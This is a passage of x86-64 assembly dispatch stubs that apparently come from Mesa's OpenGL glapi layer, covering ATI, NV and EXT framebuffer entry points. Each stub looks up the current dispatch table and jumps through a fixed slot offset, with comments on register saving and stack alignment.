#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5832(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5832(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5832(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SampleMapATI), .-GL_PREFIX(SampleMapATI)
.p2align 4,,15
.globl GL_PREFIX(SetFragmentShaderConstantATI)
.type GL_PREFIX(SetFragmentShaderConstantATI), @function
/*
 * glSetFragmentShaderConstantATI dispatch stub — jumps through dispatch
 * slot 730 (offset 5840); saves %rdi/%rsi (+%rbp alignment pad) around
 * the lookup call.
 */
GL_PREFIX(SetFragmentShaderConstantATI):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5840(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5840(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5840(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5840(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SetFragmentShaderConstantATI), .-GL_PREFIX(SetFragmentShaderConstantATI)
.p2align 4,,15
.globl GL_PREFIX(PointParameteriNV)
.type GL_PREFIX(PointParameteriNV), @function
/*
 * glPointParameteriNV dispatch stub — jumps through dispatch slot 731
 * (offset 5848); saves %rdi/%rsi (+%rbp alignment pad) around the
 * lookup call.
 */
GL_PREFIX(PointParameteriNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5848(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5848(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5848(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5848(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PointParameteriNV), .-GL_PREFIX(PointParameteriNV)
.p2align 4,,15
.globl GL_PREFIX(PointParameterivNV)
.type GL_PREFIX(PointParameterivNV), @function
/*
 * glPointParameterivNV dispatch stub — jumps through dispatch slot 732
 * (offset 5856); saves %rdi/%rsi (+%rbp alignment pad) around the
 * lookup call.
 */
GL_PREFIX(PointParameterivNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5856(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5856(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5856(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5856(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PointParameterivNV), .-GL_PREFIX(PointParameterivNV)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_733)
.type GL_PREFIX(_dispatch_stub_733), @function
HIDDEN(GL_PREFIX(_dispatch_stub_733))
/*
 * Hidden dispatch stub #733 (no public symbol name in this build) —
 * jumps through dispatch slot 733 (offset 5864); saves %rdi around
 * the lookup call.
 */
GL_PREFIX(_dispatch_stub_733):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5864(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5864(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5864(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5864(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_733), .-GL_PREFIX(_dispatch_stub_733)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_734)
.type GL_PREFIX(_dispatch_stub_734), @function
HIDDEN(GL_PREFIX(_dispatch_stub_734))
/*
 * Hidden dispatch stub #734 — jumps through dispatch slot 734
 * (offset 5872); saves %rdi around the lookup call.
 */
GL_PREFIX(_dispatch_stub_734):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5872(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5872(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5872(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5872(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_734), .-GL_PREFIX(_dispatch_stub_734)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_735)
.type GL_PREFIX(_dispatch_stub_735), @function
HIDDEN(GL_PREFIX(_dispatch_stub_735))
/*
 * Hidden dispatch stub #735 — jumps through dispatch slot 735
 * (offset 5880); saves %rdi/%rsi (+%rbp alignment pad) around the
 * lookup call.
 */
GL_PREFIX(_dispatch_stub_735):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5880(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5880(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5880(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5880(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_735), .-GL_PREFIX(_dispatch_stub_735)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_736)
.type GL_PREFIX(_dispatch_stub_736), @function
HIDDEN(GL_PREFIX(_dispatch_stub_736))
/*
 * Hidden dispatch stub #736 — jumps through dispatch slot 736
 * (offset 5888); saves %rdi/%rsi (+%rbp alignment pad) around the
 * lookup call.
 */
GL_PREFIX(_dispatch_stub_736):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5888(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5888(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5888(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5888(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_736), .-GL_PREFIX(_dispatch_stub_736)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_737)
.type GL_PREFIX(_dispatch_stub_737), @function
HIDDEN(GL_PREFIX(_dispatch_stub_737))
/*
 * Hidden dispatch stub #737 — jumps through dispatch slot 737
 * (offset 5896); saves %rdi around the lookup call.
 */
GL_PREFIX(_dispatch_stub_737):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5896(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5896(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5896(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5896(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_737), .-GL_PREFIX(_dispatch_stub_737)
.p2align 4,,15
.globl GL_PREFIX(GetProgramNamedParameterdvNV)
.type GL_PREFIX(GetProgramNamedParameterdvNV), @function
/*
 * glGetProgramNamedParameterdvNV dispatch stub — jumps through dispatch
 * slot 738 (offset 5904); saves %rdi/%rsi/%rdx/%rcx (+%rbp alignment
 * pad) around the lookup call.
 */
GL_PREFIX(GetProgramNamedParameterdvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5904(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5904(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5904(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5904(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetProgramNamedParameterdvNV), .-GL_PREFIX(GetProgramNamedParameterdvNV)
.p2align 4,,15
.globl GL_PREFIX(GetProgramNamedParameterfvNV)
.type GL_PREFIX(GetProgramNamedParameterfvNV), @function
/*
 * glGetProgramNamedParameterfvNV dispatch stub — jumps through dispatch
 * slot 739 (offset 5912); saves %rdi/%rsi/%rdx/%rcx (+%rbp alignment
 * pad) around the lookup call.
 */
GL_PREFIX(GetProgramNamedParameterfvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5912(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5912(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5912(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5912(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetProgramNamedParameterfvNV), .-GL_PREFIX(GetProgramNamedParameterfvNV)
.p2align 4,,15
.globl GL_PREFIX(ProgramNamedParameter4dNV)
.type GL_PREFIX(ProgramNamedParameter4dNV), @function
/*
 * glProgramNamedParameter4dNV dispatch stub — jumps through dispatch
 * slot 740 (offset 5920).  This entry also receives FP arguments, so the
 * non-TLS paths spill three integer arg regs and %xmm0-%xmm3 into a
 * 56-byte stack block (entry %rsp == 8 mod 16, so -56 keeps the call
 * 16-byte aligned) instead of using push/pop.
 */
GL_PREFIX(ProgramNamedParameter4dNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5920(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $56, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %rdx, 16(%rsp)
movq %xmm0, 24(%rsp)
movq %xmm1, 32(%rsp)
movq %xmm2, 40(%rsp)
movq %xmm3, 48(%rsp)
call _x86_64_get_dispatch@PLT
movq 48(%rsp), %xmm3
movq 40(%rsp), %xmm2
movq 32(%rsp), %xmm1
movq 24(%rsp), %xmm0
movq 16(%rsp), %rdx
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $56, %rsp
movq 5920(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5920(%rax), %r11
jmp *%r11
1:
subq $56, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %rdx, 16(%rsp)
movq %xmm0, 24(%rsp)
movq %xmm1, 32(%rsp)
movq %xmm2, 40(%rsp)
movq %xmm3, 48(%rsp)
call _glapi_get_dispatch
movq 48(%rsp), %xmm3
movq 40(%rsp), %xmm2
movq 32(%rsp), %xmm1
movq 24(%rsp), %xmm0
movq 16(%rsp), %rdx
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $56, %rsp
movq 5920(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ProgramNamedParameter4dNV), .-GL_PREFIX(ProgramNamedParameter4dNV)
.p2align 4,,15
.globl GL_PREFIX(ProgramNamedParameter4dvNV)
.type GL_PREFIX(ProgramNamedParameter4dvNV), @function
/*
 * glProgramNamedParameter4dvNV dispatch stub — jumps through dispatch
 * slot 741 (offset 5928); saves %rdi/%rsi/%rdx/%rcx (+%rbp alignment
 * pad) around the lookup call.
 */
GL_PREFIX(ProgramNamedParameter4dvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5928(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5928(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5928(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5928(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ProgramNamedParameter4dvNV), .-GL_PREFIX(ProgramNamedParameter4dvNV)
.p2align 4,,15
.globl GL_PREFIX(ProgramNamedParameter4fNV)
.type GL_PREFIX(ProgramNamedParameter4fNV), @function
/*
 * glProgramNamedParameter4fNV dispatch stub — jumps through dispatch
 * slot 742 (offset 5936).  Like the 4dNV variant, spills three integer
 * arg regs and %xmm0-%xmm3 into a 56-byte stack block around the lookup
 * call (the -56 adjustment preserves 16-byte call alignment).
 */
GL_PREFIX(ProgramNamedParameter4fNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5936(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $56, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %rdx, 16(%rsp)
movq %xmm0, 24(%rsp)
movq %xmm1, 32(%rsp)
movq %xmm2, 40(%rsp)
movq %xmm3, 48(%rsp)
call _x86_64_get_dispatch@PLT
movq 48(%rsp), %xmm3
movq 40(%rsp), %xmm2
movq 32(%rsp), %xmm1
movq 24(%rsp), %xmm0
movq 16(%rsp), %rdx
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $56, %rsp
movq 5936(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5936(%rax), %r11
jmp *%r11
1:
subq $56, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %rdx, 16(%rsp)
movq %xmm0, 24(%rsp)
movq %xmm1, 32(%rsp)
movq %xmm2, 40(%rsp)
movq %xmm3, 48(%rsp)
call _glapi_get_dispatch
movq 48(%rsp), %xmm3
movq 40(%rsp), %xmm2
movq 32(%rsp), %xmm1
movq 24(%rsp), %xmm0
movq 16(%rsp), %rdx
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $56, %rsp
movq 5936(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ProgramNamedParameter4fNV), .-GL_PREFIX(ProgramNamedParameter4fNV)
.p2align 4,,15
.globl GL_PREFIX(ProgramNamedParameter4fvNV)
.type GL_PREFIX(ProgramNamedParameter4fvNV), @function
/*
 * glProgramNamedParameter4fvNV dispatch stub — jumps through dispatch
 * slot 743 (offset 5944); saves %rdi/%rsi/%rdx/%rcx (+%rbp alignment
 * pad) around the lookup call.
 */
GL_PREFIX(ProgramNamedParameter4fvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5944(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5944(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5944(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5944(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ProgramNamedParameter4fvNV), .-GL_PREFIX(ProgramNamedParameter4fvNV)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_744)
.type GL_PREFIX(_dispatch_stub_744), @function
HIDDEN(GL_PREFIX(_dispatch_stub_744))
/*
 * Hidden dispatch stub #744 — jumps through dispatch slot 744
 * (offset 5952); saves %rdi/%rsi (+%rbp alignment pad) around the
 * lookup call.
 */
GL_PREFIX(_dispatch_stub_744):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5952(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5952(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5952(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5952(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_744), .-GL_PREFIX(_dispatch_stub_744)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_745)
.type GL_PREFIX(_dispatch_stub_745), @function
HIDDEN(GL_PREFIX(_dispatch_stub_745))
/*
 * Hidden dispatch stub #745 — jumps through dispatch slot 745
 * (offset 5960); saves %rdi/%rsi (+%rbp alignment pad) around the
 * lookup call.
 */
GL_PREFIX(_dispatch_stub_745):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5960(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5960(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5960(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5960(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_745), .-GL_PREFIX(_dispatch_stub_745)
.p2align 4,,15
.globl GL_PREFIX(BindFramebufferEXT)
.type GL_PREFIX(BindFramebufferEXT), @function
/*
 * glBindFramebufferEXT dispatch stub — jumps through dispatch slot 746
 * (offset 5968); saves %rdi/%rsi (+%rbp alignment pad) around the
 * lookup call.
 */
GL_PREFIX(BindFramebufferEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5968(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5968(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5968(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5968(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(BindFramebufferEXT), .-GL_PREFIX(BindFramebufferEXT)
.p2align 4,,15
.globl GL_PREFIX(BindRenderbufferEXT)
.type GL_PREFIX(BindRenderbufferEXT), @function
/*
 * glBindRenderbufferEXT dispatch stub — jumps through dispatch slot 747
 * (offset 5976); saves %rdi/%rsi (+%rbp alignment pad) around the
 * lookup call.
 */
GL_PREFIX(BindRenderbufferEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5976(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5976(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5976(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5976(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(BindRenderbufferEXT), .-GL_PREFIX(BindRenderbufferEXT)
.p2align 4,,15
.globl GL_PREFIX(CheckFramebufferStatusEXT)
.type GL_PREFIX(CheckFramebufferStatusEXT), @function
/*
 * glCheckFramebufferStatusEXT dispatch stub — jumps through dispatch
 * slot 748 (offset 5984); saves %rdi around the lookup call.
 */
GL_PREFIX(CheckFramebufferStatusEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5984(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5984(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5984(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5984(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CheckFramebufferStatusEXT), .-GL_PREFIX(CheckFramebufferStatusEXT)
.p2align 4,,15
.globl GL_PREFIX(DeleteFramebuffersEXT)
.type GL_PREFIX(DeleteFramebuffersEXT), @function
/*
 * glDeleteFramebuffersEXT dispatch stub — jumps through dispatch slot 749
 * (offset 5992); saves %rdi/%rsi (+%rbp alignment pad) around the
 * lookup call.
 */
GL_PREFIX(DeleteFramebuffersEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5992(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5992(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5992(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5992(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DeleteFramebuffersEXT), .-GL_PREFIX(DeleteFramebuffersEXT)
.p2align 4,,15
.globl GL_PREFIX(DeleteRenderbuffersEXT)
.type GL_PREFIX(DeleteRenderbuffersEXT), @function
/*
 * glDeleteRenderbuffersEXT dispatch stub — jumps through dispatch slot 750
 * (offset 6000); saves %rdi/%rsi (+%rbp alignment pad) around the
 * lookup call.
 */
GL_PREFIX(DeleteRenderbuffersEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6000(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 6000(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6000(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 6000(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DeleteRenderbuffersEXT), .-GL_PREFIX(DeleteRenderbuffersEXT)
.p2align 4,,15
.globl GL_PREFIX(FramebufferRenderbufferEXT)
.type GL_PREFIX(FramebufferRenderbufferEXT), @function
/*
 * glFramebufferRenderbufferEXT dispatch stub — jumps through dispatch
 * slot 751 (offset 6008); saves %rdi/%rsi/%rdx/%rcx (+%rbp alignment
 * pad) around the lookup call.
 */
GL_PREFIX(FramebufferRenderbufferEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6008(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6008(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6008(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6008(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(FramebufferRenderbufferEXT), .-GL_PREFIX(FramebufferRenderbufferEXT)
.p2align 4,,15
.globl GL_PREFIX(FramebufferTexture1DEXT)
.type GL_PREFIX(FramebufferTexture1DEXT), @function
/*
 * glFramebufferTexture1DEXT dispatch stub — jumps through dispatch
 * slot 752 (offset 6016); saves the five arg registers
 * %rdi/%rsi/%rdx/%rcx/%r8 (odd count, so no pad needed) around the
 * lookup call.
 */
GL_PREFIX(FramebufferTexture1DEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6016(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6016(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6016(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6016(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(FramebufferTexture1DEXT), .-GL_PREFIX(FramebufferTexture1DEXT)
.p2align 4,,15
.globl GL_PREFIX(FramebufferTexture2DEXT)
.type GL_PREFIX(FramebufferTexture2DEXT), @function
/*
 * glFramebufferTexture2DEXT dispatch stub — jumps through dispatch
 * slot 753 (offset 6024); saves %rdi/%rsi/%rdx/%rcx/%r8 around the
 * lookup call.
 */
GL_PREFIX(FramebufferTexture2DEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6024(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6024(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6024(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6024(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(FramebufferTexture2DEXT), .-GL_PREFIX(FramebufferTexture2DEXT)
.p2align 4,,15
.globl GL_PREFIX(FramebufferTexture3DEXT)
.type GL_PREFIX(FramebufferTexture3DEXT), @function
/*
 * glFramebufferTexture3DEXT dispatch stub — jumps through dispatch
 * slot 754 (offset 6032); saves all six integer arg registers (+%rbp
 * alignment pad) around the lookup call.
 */
GL_PREFIX(FramebufferTexture3DEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6032(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6032(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6032(%rax), %r11
jmp *%r11
1:
pushq %rdi
